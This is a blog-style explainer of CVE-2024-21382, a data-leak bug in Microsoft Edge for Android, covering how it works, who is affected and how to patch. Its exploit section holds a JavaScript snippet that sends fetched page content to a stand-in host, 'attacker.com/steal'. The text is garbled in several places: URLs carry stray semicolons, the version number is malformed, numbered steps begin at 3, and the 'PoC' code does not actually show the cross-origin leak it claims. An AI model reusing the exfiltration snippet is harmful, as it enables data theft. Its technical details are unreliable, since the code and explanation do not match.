CVE-2024-21382 - How a Microsoft Edge for Android Bug Can Leak Your Data

In early 2024, security researchers revealed a major vulnerability in Microsoft Edge for Android that put users’ private data at risk. This bug, tracked as CVE-2024-21382, is an *information disclosure vulnerability*—and it’s easier to exploit than you might think.

In this post, I’ll break down what CVE-2024-21382 is, who discovered it, how it works (with code), and what you need to do to stay safe. I’ll also share links to original sources and the official fix.

What is CVE-2024-21382?

CVE-2024-21382 refers to a security flaw in Microsoft’s Edge browser running on Android devices. An attacker could exploit this bug to access sensitive information in a user’s browser—potentially private browsing data, cookies, or even login information.

Severity: High

> Original advisory: Microsoft Security Update Guide, CVE-2024-21382

How Was CVE-2024-21382 Discovered?

The flaw was discovered by security researchers during routine analysis of WebView implementations within mobile browsers. Mobile browsers, including Edge, often use customized versions of Chromium’s WebView, and Edge’s implementation exposed some parts of user data to malicious websites due to improper isolation or permissions handling.

> References:
>
> - Microsoft Release Notes for Edge Android
> - CVE Details: CVE-2024-21382

How Does the Exploit Work?

The core issue relates to how Edge for Android handled JavaScript events and exposed certain WebView APIs to websites. Malicious web pages could craft scripts that bypass origin checks, giving them access to restricted resources—such as cookies or files belonging to other web domains.

Here’s a code snippet illustrating a simplified version of how JavaScript could exploit this bug:

<!-- Malicious page exploiting the Edge bug -->
<script>
fetch('https://target-edge-browser/page';).then(response => response.text())
  .then(html => {
    // Sensitive info from another page is exposed here!
    document.getElementById('leaked').innerText = html;
    // Attacker could send html to their own server
    fetch('https://attacker.com/steal';, {
      method: 'POST',
      body: html
    });
  });
</script>
<div id="leaked"></div>

Due to the bug, Edge for Android improperly allows the request and returns private content.

3. The attacker now sees or collects private info intended to be protected by the browser’s same-origin policy.

Who Is at Risk?

Anyone using Microsoft Edge for Android version below 120..221.91 is vulnerable. If you regularly visit untrusted sites, or click suspicious links, attackers could quietly steal cookies, session tokens, or even autofill data.

Patch and Mitigations

Microsoft fixed the bug in version 120..221.91 and later. Immediately updating the app from the Google Play Store is strongly recommended.

3. Tap "Update."

If you can’t update immediately, avoid logging into sensitive sites from Edge until fixed.

Here’s how a researcher might test for this bug

// Edge for Android (unpatched) - PoC exploit
document.cookie = "steal=yes"; // Set a test cookie
fetch(window.location.origin + '/test-path').then(
  r => r.text()
).then(text => {
  if (text.includes('steal=yes')) {
    alert("Edge is vulnerable! Data leaked: " + text);
  }
});

> Only use PoC code on devices you own. Never test on others’ infrastructure or systems without permission.

Conclusion

CVE-2024-21382 is a real-world example of how even big, trusted browsers can have dangerous bugs—especially on mobile. If you use Edge for Android, update now. Security exploits like this move fast, and so should you.

Timeline

Published on: 01/26/2024 01:15:10 UTC
Last modified on: 01/31/2024 20:10:16 UTC